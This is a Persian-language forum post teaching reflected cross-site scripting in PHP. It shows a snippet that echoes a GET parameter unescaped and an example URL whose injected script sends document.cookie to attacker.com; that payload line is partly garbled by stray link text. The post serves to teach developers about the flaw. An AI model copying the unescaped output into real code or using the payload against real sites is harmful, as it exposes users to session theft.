نمایش نتایج: از شماره 1 تا 5 , از مجموع 5

موضوع: امنيت در برنامه نويسي php

Threaded View

پست قبلی پست قبلی   پست بعدی پست بعدی
  1. #2
    عضو دائم Rezash آواتار ها
    تاریخ عضویت
    Feb 2010
    محل سکونت
    مشهد
    نوشته ها
    1,923
    تشکر تشکر کرده 
    889
    تشکر تشکر شده 
    2,385
    تشکر شده در
    1,535 پست

    پیش فرض پاسخ : امنيت در برنامه نويسي php

    Cross Site Scripting
    فرض كنيد در قسمتي از سايت شما ، قرار هست به كاربر پيغامي رو بر اساس وضعيتي كه داريم نمايش بديم.
    كد نويسي انجام شده به اين صورت هست :
    کد PHP:
    <?php

    If(isset($_GET['msg']))
        Echo  
    $_GET['msg'];
    ?>
    در اين صورت پيغام هاي مختلف رو به راحتي ميتونيد براي كاربر نمايش بديد :
    کد HTML:
    File.php?msg=Wrong user/pass
    File.php?msg=404 page not found
    و لزوما هم متد GET نيست و ممكن هست براي مخفي كردن پيام د آدرس بار از ديد كاربر اين عمل رو با متد POST انجام بديد.
    اشكال كار كجاست ؟
    فرض كنيد اين لينك به كاربر شما ارائه بشه :
    کد HTML:
    File.php?msg= This site is hacked !
    و يا :

    کد HTML:
    File.php?msg= <b> This site is hacked ! </b>
    اما اشكال اصلي كار اينجا نيست ! درسته در اين صورت كاربر سايت شما با پيغام نامناسب روبرو ميشه اما اصل اين خطر مربوطه به مورد حمله قرار دادن كاربر شما و سرقت اطلاعات كاربر هست.
    فرض كنيد اين لينك به كاربر شما ارائه بشه :
    File.php?msg=<script>document.location = attacker.com: The Best Search Links on the Net' + document.cookie</script>
    شايد متوجه مشكل شده باشيد !
    بله در اين صورت كوكي ها كاربر به آدرس attacker.com/file.php ارسال ميشند.
    البته اگر در كوكي ها اطلاعات حساسي نگه نداشته باشيم و با رعايت نكات ايمني سشن ها و كوكي ها رو بدرستي استفاده كرده باشيم مشكل خاصي پيش نمياد.اما در بسياري از برنامه ها كاربر به صرف داشتن كوكي ها صاحب حساب تلقي ميشه.
    در قسمت بعد در رابطه با COOKIE ها و SESSION ها با مثال هاي عملي صحبت ميكنيم.
    بک آپ بگیرید قبل از آنکه پشیمان شوید!
    تشخیص سیستم مدیریت محتوای سایت - سایت شخصی

  2. تعداد تشکر ها از Rezash به دلیل پست مفید


اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. همكار پروژه اي كدنويسي وبسايت
    توسط GoldinHost.IR در انجمن به دنبال کارمند هستم
    پاسخ ها: 0
    آخرين نوشته: May 19th, 2017, 09:37
  2. تغييرات در سايت كه با دات نت برنامه نويسي شده
    توسط mohsenshayan در انجمن درخواست خدمات برنامه نویسی
    پاسخ ها: 0
    آخرين نوشته: April 26th, 2015, 03:12
  3. اديت قالب (يه كد نويسي حرفه اي لازم داريم)
    توسط vahidxiii در انجمن درخواست خدمات برنامه نویسی
    پاسخ ها: 1
    آخرين نوشته: June 10th, 2014, 12:58
  4. طراحي و برنامه نويسي سايت پيشبيني فوتبال
    توسط Mass70 در انجمن درخواست خدمات برنامه نویسی
    پاسخ ها: 7
    آخرين نوشته: April 20th, 2013, 16:37
  5. پاسخ ها: 5
    آخرين نوشته: September 17th, 2009, 14:19

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •